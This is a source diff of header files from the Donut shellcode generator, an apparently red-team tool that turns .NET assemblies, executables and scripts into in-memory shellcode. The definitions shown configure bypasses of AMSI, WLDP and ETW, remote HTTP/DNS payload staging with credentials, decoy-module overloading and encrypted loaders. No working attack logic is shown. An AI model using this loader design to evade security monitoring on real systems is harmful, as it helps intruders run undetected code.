113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
110 #define DONUT_KEY_LEN 16
111 #define DONUT_BLK_LEN 16
112
113 #define DONUT_ERROR_OK 0
114 #define DONUT_ERROR_FILE_NOT_FOUND 1
115 #define DONUT_ERROR_FILE_EMPTY 2
116 #define DONUT_ERROR_FILE_ACCESS 3
117 #define DONUT_ERROR_FILE_INVALID 4
118 #define DONUT_ERROR_NET_PARAMS 5
119 #define DONUT_ERROR_NO_MEMORY 6
120 #define DONUT_ERROR_INVALID_ARCH 7
121 #define DONUT_ERROR_INVALID_URL 8
122 #define DONUT_ERROR_URL_LENGTH 9
123 #define DONUT_ERROR_INVALID_PARAMETER 10
124 #define DONUT_ERROR_RANDOM 11
125 #define DONUT_ERROR_DLL_FUNCTION 12
126 #define DONUT_ERROR_ARCH_MISMATCH 13
127 #define DONUT_ERROR_DLL_PARAM 14
128 #define DONUT_ERROR_BYPASS_INVALID 15
129 #define DONUT_ERROR_INVALID_FORMAT 16
130 #define DONUT_ERROR_INVALID_ENGINE 17
131 #define DONUT_ERROR_COMPRESSION 18
132 #define DONUT_ERROR_INVALID_ENTROPY 19
133 #define DONUT_ERROR_MIXED_ASSEMBLY 20
134 #define DONUT_ERROR_HEADERS_INVALID 21
135 #define DONUT_ERROR_DECOY_INVALID 22
115136
116137 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
138 #define DONUT_ARCH_ANY -1 // for vbs and js files
139 #define DONUT_ARCH_X86 1 // x86
140 #define DONUT_ARCH_X64 2 // AMD64
141 #define DONUT_ARCH_X84 3 // x86 + AMD64
121142
122143 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
144 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
145 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
146 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
147 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
148 #define DONUT_MODULE_VBS 5 // VBScript
149 #define DONUT_MODULE_JS 6 // JavaScript or JScript
150
151 // format type
152 #define DONUT_FORMAT_BINARY 1
153 #define DONUT_FORMAT_BASE64 2
154 #define DONUT_FORMAT_C 3
155 #define DONUT_FORMAT_RUBY 4
156 #define DONUT_FORMAT_PYTHON 5
157 #define DONUT_FORMAT_POWERSHELL 6
158 #define DONUT_FORMAT_CSHARP 7
159 #define DONUT_FORMAT_HEX 8
160
161 // compression engine
162 #define DONUT_COMPRESS_NONE 1
163 #define DONUT_COMPRESS_APLIB 2
164 #define DONUT_COMPRESS_LZNT1 3 // COMPRESSION_FORMAT_LZNT1
165 #define DONUT_COMPRESS_XPRESS 4 // COMPRESSION_FORMAT_XPRESS
166
167 // entropy level
168 #define DONUT_ENTROPY_NONE 1 // don't use any entropy
169 #define DONUT_ENTROPY_RANDOM 2 // use random names
170 #define DONUT_ENTROPY_DEFAULT 3 // use random names + symmetric encryption
171
172 // misc options
173 #define DONUT_OPT_EXIT_THREAD 1 // after the main shellcode ends, return to the caller which eventually calls RtlExitUserThread
174 #define DONUT_OPT_EXIT_PROCESS 2 // after the main shellcode ends, call RtlExitUserProcess to terminate host process
130175
131176 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
177 #define DONUT_INSTANCE_EMBED 1 // Module is embedded
178 #define DONUT_INSTANCE_HTTP 2 // Module is downloaded from remote HTTP/HTTPS server
179 #define DONUT_INSTANCE_DNS 3 // Module is downloaded from remote DNS server
180
181 // AMSI/WLDP level
182 #define DONUT_BYPASS_NONE 1 // Disables bypassing AMSI/WDLP
183 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
184 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
185
186 // Preserve PE headers options
187 #define DONUT_HEADERS_OVERWRITE 1 // Overwrite PE headers
188 #define DONUT_HEADERS_KEEP 2 // Preserve PE headers
189
190 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
191 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
192 #define DONUT_MAX_MODNAME 8
193 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
194 #define DONUT_VER_LEN 32
195 #define DONUT_DOMAIN_LEN 8
151196
152197 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153198 #define DONUT_RUNTIME_NET4 "v4.0.30319"
163208 #define COMBASE_DLL "combase.dll"
164209 #define USER32_DLL "user32.dll"
165210 #define SHLWAPI_DLL "shlwapi.dll"
211 #define SHELL32_DLL "shell32.dll"
166212
167213 // Per the ECMA spec, the section data looks like this:
168214 // taken from https://github.com/dotnet/coreclr/
179225 //
180226 typedef struct _file_info_t {
181227 int fd;
182 uint64_t size;
183 uint8_t *map;
228 uint32_t len, zlen;
229 uint8_t *data, *zdata;
184230
185231 // the following are set for unmanaged or .NET PE/DLL files
186232 int type;
194240 } API_IMPORT, *PAPI_IMPORT;
195241
196242 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
243 uint8_t mk[DONUT_KEY_LEN]; // master key
244 uint8_t ctr[DONUT_BLK_LEN]; // counter + nonce
199245 } DONUT_CRYPT, *PDONUT_CRYPT;
200
246
201247 // everything required for a module goes in the following structure
202248 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
249 int type; // EXE/DLL/JS/VBS
250 int thread; // run entrypoint of unmanaged EXE as a thread
251 int compress; // indicates engine used for compression
252
253 char runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
254 char domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
255 char cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
256 char method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
257
258 char args[DONUT_MAX_NAME]; // string arguments for both managed and unmanaged DLL/EXE
259 int unicode; // convert param to unicode for unmanaged DLL function
260
261 char sig[DONUT_SIG_LEN]; // string to verify decryption
262 uint64_t mac; // hash of sig, to verify decryption was ok
263
264 uint32_t zlen; // compressed size of EXE/DLL/JS/VBS file
265 uint32_t len; // real size of EXE/DLL/JS/VBS file
266 uint8_t data[4]; // data of EXE/DLL/JS/VBS file
214267 } DONUT_MODULE, *PDONUT_MODULE;
215268
216269 // everything required for an instance goes into the following structure
217270 typedef struct _DONUT_INSTANCE {
218271 uint32_t len; // total size of instance
219 DONUT_CRYPT key; // decrypts instance
272 DONUT_CRYPT key; // decrypts instance if encryption enabled
220273
221274 uint64_t iv; // the 64-bit initial value for maru hash
222275
223276 union {
224 uint64_t hash[64]; // holds up to 64 api hashes
225 void *addr[64]; // holds up to 64 api addresses
226 // include prototypes only if header included from payload.h
227 #ifdef PAYLOAD_H
277 uint64_t hash[57]; // holds up to 57 api hashes
278 void *addr[57]; // holds up to 57 api addresses
279 // include prototypes only if header included from loader.h
280 #ifdef LOADER_H
228281 struct {
229282 // imports from kernel32.dll or kernelbase.dll
230 LoadLibraryA_t LoadLibraryA;
231 GetProcAddress_t GetProcAddress;
232 GetModuleHandleA_t GetModuleHandleA;
233 VirtualAlloc_t VirtualAlloc; // required to allocate RW memory for instance
234 VirtualFree_t VirtualFree;
235 VirtualQuery_t VirtualQuery;
236 VirtualProtect_t VirtualProtect;
237 Sleep_t Sleep;
238 MultiByteToWideChar_t MultiByteToWideChar;
239 GetUserDefaultLCID_t GetUserDefaultLCID;
283 LoadLibraryA_t LoadLibraryA;
284 GetProcAddress_t GetProcAddress;
285 GetModuleHandleA_t GetModuleHandleA;
286 VirtualAlloc_t VirtualAlloc;
287 VirtualFree_t VirtualFree;
288 Sleep_t Sleep;
289 MultiByteToWideChar_t MultiByteToWideChar;
290 GetUserDefaultLCID_t GetUserDefaultLCID;
291 CreateThread_t CreateThread;
292 CreateFileA_t CreateFileA;
293 GetThreadContext_t GetThreadContext;
294 GetCurrentThread_t GetCurrentThread;
295 GetCurrentProcess_t GetCurrentProcess;
296 GetCommandLineA_t GetCommandLineA;
297 GetCommandLineW_t GetCommandLineW;
298 HeapAlloc_t HeapAlloc;
299 HeapReAlloc_t HeapReAlloc;
300 GetProcessHeap_t GetProcessHeap;
301 HeapFree_t HeapFree;
302 GetLastError_t GetLastError;
303
304 // imports from shell32.dll
305 CommandLineToArgvW_t CommandLineToArgvW;
240306
241307 // imports from oleaut32.dll
242 SafeArrayCreate_t SafeArrayCreate;
243 SafeArrayCreateVector_t SafeArrayCreateVector;
244 SafeArrayPutElement_t SafeArrayPutElement;
245 SafeArrayDestroy_t SafeArrayDestroy;
246 SafeArrayGetLBound_t SafeArrayGetLBound;
247 SafeArrayGetUBound_t SafeArrayGetUBound;
248 SysAllocString_t SysAllocString;
249 SysFreeString_t SysFreeString;
250 LoadTypeLib_t LoadTypeLib;
308 SafeArrayCreate_t SafeArrayCreate;
309 SafeArrayCreateVector_t SafeArrayCreateVector;
310 SafeArrayPutElement_t SafeArrayPutElement;
311 SafeArrayDestroy_t SafeArrayDestroy;
312 SafeArrayGetLBound_t SafeArrayGetLBound;
313 SafeArrayGetUBound_t SafeArrayGetUBound;
314 SysAllocString_t SysAllocString;
315 SysFreeString_t SysFreeString;
316 LoadTypeLib_t LoadTypeLib;
251317
252318 // imports from wininet.dll
253 InternetCrackUrl_t InternetCrackUrl;
254 InternetOpen_t InternetOpen;
255 InternetConnect_t InternetConnect;
256 InternetSetOption_t InternetSetOption;
257 InternetReadFile_t InternetReadFile;
258 InternetCloseHandle_t InternetCloseHandle;
259 HttpOpenRequest_t HttpOpenRequest;
260 HttpSendRequest_t HttpSendRequest;
261 HttpQueryInfo_t HttpQueryInfo;
319 InternetCrackUrl_t InternetCrackUrl;
320 InternetOpen_t InternetOpen;
321 InternetConnect_t InternetConnect;
322 InternetSetOption_t InternetSetOption;
323 InternetReadFile_t InternetReadFile;
324 InternetCloseHandle_t InternetCloseHandle;
325 InternetQueryDataAvailable_t InternetQueryDataAvailable;
326 HttpOpenRequest_t HttpOpenRequest;
327 HttpSendRequest_t HttpSendRequest;
328 HttpQueryInfo_t HttpQueryInfo;
262329
263330 // imports from mscoree.dll
264 CorBindToRuntime_t CorBindToRuntime;
265 CLRCreateInstance_t CLRCreateInstance;
331 CorBindToRuntime_t CorBindToRuntime;
332 CLRCreateInstance_t CLRCreateInstance;
266333
267334 // imports from ole32.dll
268 CoInitializeEx_t CoInitializeEx;
269 CoCreateInstance_t CoCreateInstance;
270 CoUninitialize_t CoUninitialize;
335 CoInitializeEx_t CoInitializeEx;
336 CoCreateInstance_t CoCreateInstance;
337 CoUninitialize_t CoUninitialize;
338
339 // imports from ntdll.dll
340 RtlEqualUnicodeString_t RtlEqualUnicodeString;
341 RtlEqualString_t RtlEqualString;
342 RtlUnicodeStringToAnsiString_t RtlUnicodeStringToAnsiString;
343 RtlInitUnicodeString_t RtlInitUnicodeString;
344 RtlExitUserThread_t RtlExitUserThread;
345 RtlExitUserProcess_t RtlExitUserProcess;
346 RtlCreateUnicodeString_t RtlCreateUnicodeString;
347 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
348 RtlDecompressBuffer_t RtlDecompressBuffer;
349 NtContinue_t NtContinue;
350 AddVectoredExceptionHandler_t AddVectoredExceptionHandler;
351 RemoveVectoredExceptionHandler_t RemoveVectoredExceptionHandler;
271352 };
272353 #endif
273354 } api;
355
356 // pointer to syscall table for syswhispers2
357 uint64_t syscall_list;
358
359 int exit_opt; // 1 to call RtlExitUserProcess and terminate the host process
360 int entropy; // indicates entropy level
361 uint64_t oep; // original entrypoint
274362
275363 // everything from here is encrypted
276364 int api_cnt; // the 64-bit hashes of API required for instance to work
277 int dll_cnt; // the number of DLL to load before resolving API
278 char dll_name[DONUT_MAX_DLL][32]; // a list of DLL strings to load
279
280 union {
281 char s[8]; // amsi.dll
282 uint32_t w[2];
283 } amsi;
284
285 int bypass; // indicates behaviour of byassing AMSI/WLDP
286 char clr[8]; // clr.dll
287 char wldp[16]; // wldp.dll
365 char dll_names[DONUT_MAX_NAME]; // a list of DLL strings to load, separated by semi-colon
366
367 char dataname[8]; // ".data"
368 char kernelbase[12]; // "kernelbase"
369 char amsi[8]; // "amsi"
370 char clr[4]; // "clr"
371 char wldp[8]; // "wldp"
372 char ntdll[8]; // "ntdll"
373
374 char cmd_syms[DONUT_MAX_NAME]; // symbols related to command line
375 char exit_api[DONUT_MAX_NAME]; // exit-related API
376
377 int bypass; // indicates behaviour of byassing AMSI/WLDP/ETW
378 int headers; // indicates whether to overwrite PE headers
288379 char wldpQuery[32]; // WldpQueryDynamicCodeTrust
289380 char wldpIsApproved[32]; // WldpIsClassInApprovedList
290381 char amsiInit[16]; // AmsiInitialize
291382 char amsiScanBuf[16]; // AmsiScanBuffer
292383 char amsiScanStr[16]; // AmsiScanString
293
294 uint16_t wscript[8]; // WScript
295 uint16_t wscript_exe[16]; // wscript.exe
296
297 GUID xIID_IUnknown;
298 GUID xIID_IDispatch;
384 char etwEventWrite[16]; // EtwEventWrite
385 char etwEventUnregister[20]; // EtwEventUnregister
386 char etwRet64[1]; // "ret" instruction for Etw
387 char etwRet32[4]; // "ret 14h" instruction for Etw
388
389 char wscript[8]; // WScript
390 char wscript_exe[14]; // wscript.exe
391
392 char decoy[MAX_PATH * 2]; // path of decoy module
393
394 GUID xIID_IUnknown;
395 GUID xIID_IDispatch;
299396
300397 // GUID required to load .NET assemblies
301 GUID xCLSID_CLRMetaHost;
302 GUID xIID_ICLRMetaHost;
303 GUID xIID_ICLRRuntimeInfo;
304 GUID xCLSID_CorRuntimeHost;
305 GUID xIID_ICorRuntimeHost;
306 GUID xIID_AppDomain;
398 GUID xCLSID_CLRMetaHost;
399 GUID xIID_ICLRMetaHost;
400 GUID xIID_ICLRRuntimeInfo;
401 GUID xCLSID_CorRuntimeHost;
402 GUID xIID_ICorRuntimeHost;
403 GUID xIID_AppDomain;
307404
308405 // GUID required to run VBS and JS files
309 GUID xCLSID_ScriptLanguage; // vbs or js
310 GUID xIID_IHost; // wscript object
311 GUID xIID_IActiveScript; // engine
312 GUID xIID_IActiveScriptSite; // implementation
313 GUID xIID_IActiveScriptParse32; // parser
314 GUID xIID_IActiveScriptParse64;
315
316 // GUID required to run XSL files
317 GUID xCLSID_DOMDocument30;
318 GUID xIID_IXMLDOMDocument;
319 GUID xIID_IXMLDOMNode;
320
321 int type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
322
323 struct {
324 char url[DONUT_MAX_URL]; // staging server hosting donut module
325 char req[8]; // just a buffer for "GET"
326 } http;
327
328 uint8_t sig[DONUT_MAX_NAME]; // string to hash
329 uint64_t mac; // to verify decryption ok
406 GUID xCLSID_ScriptLanguage; // vbs or js
407 GUID xIID_IHost; // wscript object
408 GUID xIID_IActiveScript; // engine
409 GUID xIID_IActiveScriptSite; // implementation
410 GUID xIID_IActiveScriptSiteWindow; // basic GUI stuff
411 GUID xIID_IActiveScriptParse32; // parser
412 GUID xIID_IActiveScriptParse64;
413
414 int type; // DONUT_INSTANCE_EMBED, DONUT_INSTANCE_HTTP
415 char server[DONUT_MAX_NAME]; // staging server hosting donut module
416 char username[DONUT_MAX_NAME]; // username for web server
417 char password[DONUT_MAX_NAME]; // password for web server
418 char http_req[8]; // just a buffer for "GET"
419
420 uint8_t sig[DONUT_MAX_NAME]; // string to hash
421 uint64_t mac; // to verify decryption ok
330422
331423 DONUT_CRYPT mod_key; // used to decrypt module
332424 uint64_t mod_len; // total size of module
333425
334426 union {
335 PDONUT_MODULE p; // for URL
336 DONUT_MODULE x; // for PIC
427 PDONUT_MODULE p; // Memory allocated for module downloaded via DNS or HTTP
428 DONUT_MODULE x; // Module is embedded
337429 } module;
338430 } DONUT_INSTANCE, *PDONUT_INSTANCE;
339431
340432 typedef struct _DONUT_CONFIG {
341 int arch; // target architecture for shellcode
342 int bypass; // bypass option for AMSI/WDLP
343 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
344 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
345 char method[DONUT_MAX_NAME]; // name of method to execute
346 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
347 char file[DONUT_MAX_NAME]; // assembly to create module from
348 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
349 char runtime[DONUT_MAX_NAME]; // runtime version to use.
350 char modname[DONUT_MAX_NAME]; // name of module written to disk
351
352 int mod_type; // DONUT_MODULE_DLL or DONUT_MODULE_EXE
353 uint64_t mod_len; // size of DONUT_MODULE
354 PDONUT_MODULE mod; // points to donut module
355
356 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
357 uint64_t inst_len; // size of DONUT_INSTANCE
358 PDONUT_INSTANCE inst; // points to donut instance
359
360 uint64_t pic_len; // size of shellcode
361 void* pic; // points to PIC/shellcode
433 uint32_t len, zlen; // original length of input file and compressed length
434 // general / misc options for loader
435 int arch; // target architecture
436 int bypass; // bypass option for AMSI/WDLP
437 int headers; // preserve PE headers option
438 int compress; // engine to use when compressing file via RtlCompressBuffer
439 int entropy; // entropy/encryption level
440 int format; // output format for loader
441 int exit_opt; // return to caller or invoke RtlExitUserProcess to terminate the host process
442 int thread; // run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API
443 uint64_t oep; // original entrypoint of target host file
444
445 // files in/out
446 char input[DONUT_MAX_NAME]; // name of input file to read and load in-memory
447 char output[DONUT_MAX_NAME]; // name of output file to save loader
448
449 // .NET stuff
450 char runtime[DONUT_MAX_NAME]; // runtime version to use for CLR
451 char domain[DONUT_MAX_NAME]; // name of domain to create for .NET DLL/EXE
452 char cls[DONUT_MAX_NAME]; // name of class with optional namespace for .NET DLL
453 char method[DONUT_MAX_NAME]; // name of method or DLL function to invoke for .NET DLL and unmanaged DLL
454
455 // command line for DLL/EXE
456 char args[DONUT_MAX_NAME]; // command line to use for unmanaged DLL/EXE and .NET DLL/EXE
457 int unicode; // param is passed to DLL function without converting to unicode
458
459 // module overloading stuff
460 char decoy[2056]; // path of decoy module
461
462 // HTTP/DNS staging information
463 char server[DONUT_MAX_NAME]; // points to root path of where module will be stored on remote HTTP server or DNS server
464 char auth[DONUT_MAX_NAME]; // username and password for web server
465 char modname[DONUT_MAX_NAME]; // name of module written to disk for http stager
466
467 // DONUT_MODULE
468 int mod_type; // VBS/JS/DLL/EXE
469 int mod_len; // size of DONUT_MODULE
470 DONUT_MODULE *mod; // points to DONUT_MODULE
471
472 // DONUT_INSTANCE
473 int inst_type; // DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP
474 int inst_len; // size of DONUT_INSTANCE
475 DONUT_INSTANCE *inst; // points to DONUT_INSTANCE
476
477 // shellcode generated from configuration
478 int pic_len; // size of loader/shellcode
479 void* pic; // points to loader/shellcode
362480 } DONUT_CONFIG, *PDONUT_CONFIG;
363481
364482 #ifdef __cplusplus
374492 // public functions
375493 EXPORT_FUNC int DonutCreate(PDONUT_CONFIG);
376494 EXPORT_FUNC int DonutDelete(PDONUT_CONFIG);
495 EXPORT_FUNC const char* DonutError(int);
377496
378497 #ifdef __cplusplus
379498 }
include/donut.ico less more
Binary diff not shown
+23
-0
include/donut.rc less more
0 id ICON "donut.ico"
1
2 1 VERSIONINFO
3 FILEVERSION 0,9,3,0
4 PRODUCTVERSION 0,9,3,0
5 BEGIN
6 BLOCK "StringFileInfo"
7 BEGIN
8 BLOCK "080904E4"
9 BEGIN
10 VALUE "FileDescription", "Donut shellcode generator"
11 VALUE "FileVersion", "0.9.3"
12 VALUE "InternalName", "donut"
13 VALUE "OriginalFilename", "donut.exe"
14 VALUE "ProductName", "Donut"
15 VALUE "ProductVersion", "0.9.3"
16 END
17 END
18 BLOCK "VarFileInfo"
19 BEGIN
20 VALUE "Translation", 0x809, 1252
21 END
22 END
+2
-1
include/encrypt.h less more
3333
3434 #include <stdint.h>
3535 #include <stddef.h>
36 #include <stdio.h>
3637
3738 #ifndef ROTR32
3839 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
4950 extern "C" {
5051 #endif
5152
52 void donut_encrypt(void *mk, void *ctr, void *data, size_t len);
53 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len);
5354
5455 #define donut_decrypt(mk,ctr,data,len) donut_encrypt(mk,ctr,data,len)
5556
+53
-0
include/format.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef FORMAT_H
32 #define FORMAT_H
33
34 #include "donut.h"
35
36 #ifdef __cplusplus
37 extern "C" {
38 #endif
39
40 int base64_template(void *pic, uint32_t pic_len, FILE *fd);
41 int c_ruby_template(void *pic, uint32_t pic_len, FILE *fd);
42 int py_template(void *pic, uint32_t pic_len, FILE* fd);
43 int powershell_template(void *pic, uint32_t pic_len, FILE *fd);
44 int csharp_template(void *pic, uint32_t pic_len, FILE *fd);
45 int hex_template(void *pic, uint32_t pic_len, FILE *fd);
46
47 #ifdef __cplusplus
48 }
49 #endif
50
51 #endif
52
+5
-1
include/hash.h less more
3434 #include <stdint.h>
3535 #include <string.h>
3636
37 void *Memset (void *ptr, int value, size_t num);
37 void *Memset (void *ptr, int value, unsigned int num);
3838
3939 #define MARU_MAX_STR 64
4040 #define MARU_BLK_LEN 16
4444
4545 #ifndef ROTR32
4646 #define ROTR32(v,n)(((v)>>(n))|((v)<<(32-(n))))
47 #endif
48
49 #ifndef ROTL32
50 #define ROTL32(v,n)(((v)<<(n))|((v)>>(32-(n))))
4751 #endif
4852
4953 #ifdef __cplusplus
+3
-4
include/mmap-windows.c less more
1212
1313 #include "mmap.h"
1414
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
15 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset)
1616 {
1717 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
1818 return MAP_FAILED;
5757 dwDesiredAccess |= FILE_MAP_COPY;
5858 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
5959 if (ret == NULL) {
60 CloseHandle(h);
6160 ret = MAP_FAILED;
6261 }
62 CloseHandle(h);
6363 return ret;
6464 }
6565
66 void munmap(void *addr, size_t length)
66 void munmap(void *addr, uint32_t length)
6767 {
6868 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
7069 }
7170
7271 #undef DWORD_HI
+2
-2
include/mmap.h less more
3434 extern "C" {
3535 #endif
3636
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
37 void *mmap(void *start, uint32_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, uint32_t length);
3939
4040 #ifdef __cplusplus
4141 }
+0
-16
include/wintypes.h less more
66
77 #ifndef __WIN_TYPES
88 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
209
2110 #ifdef _MSC_VER
2211 #include <stdint.h>
7766 typedef uint16_t WCHAR;
7867 #endif
7968
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
8569 #ifndef VOID
8670 #define VOID void
8771 typedef char CHAR;
lib/aplib32.a less more
Binary diff not shown
lib/aplib32.lib less more
Binary diff not shown
lib/aplib64.a less more
Binary diff not shown
lib/aplib64.lib less more
Binary diff not shown
+139
-64
lib/donut.h less more
3838 #include <sys/stat.h>
3939 #include <inttypes.h>
4040
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
41 #if defined(_WIN32) || defined(_WIN64)
42 #define WINDOWS
43 #include <windows.h>
44 #else
45 #define LINUX
46 #include <unistd.h>
47 #include <dlfcn.h>
48 #endif
49
50 #define DONUT_ERROR_SUCCESS 0
51 #define DONUT_ERROR_FILE_NOT_FOUND 1
52 #define DONUT_ERROR_FILE_EMPTY 2
53 #define DONUT_ERROR_FILE_ACCESS 3
54 #define DONUT_ERROR_FILE_INVALID 4
55 #define DONUT_ERROR_NET_PARAMS 5
56 #define DONUT_ERROR_NO_MEMORY 6
57 #define DONUT_ERROR_INVALID_ARCH 7
58 #define DONUT_ERROR_INVALID_URL 8
59 #define DONUT_ERROR_URL_LENGTH 9
60 #define DONUT_ERROR_INVALID_PARAMETER 10
61 #define DONUT_ERROR_RANDOM 11
62 #define DONUT_ERROR_DLL_FUNCTION 12
63 #define DONUT_ERROR_ARCH_MISMATCH 13
64 #define DONUT_ERROR_DLL_PARAM 14
65 #define DONUT_ERROR_BYPASS_INVALID 15
66 #define DONUT_ERROR_INVALID_ENCODING 16
67 #define DONUT_ERROR_INVALID_ENGINE 17
68 #define DONUT_ERROR_COMPRESSION 18
69 #define DONUT_ERROR_INVALID_ENTROPY 19
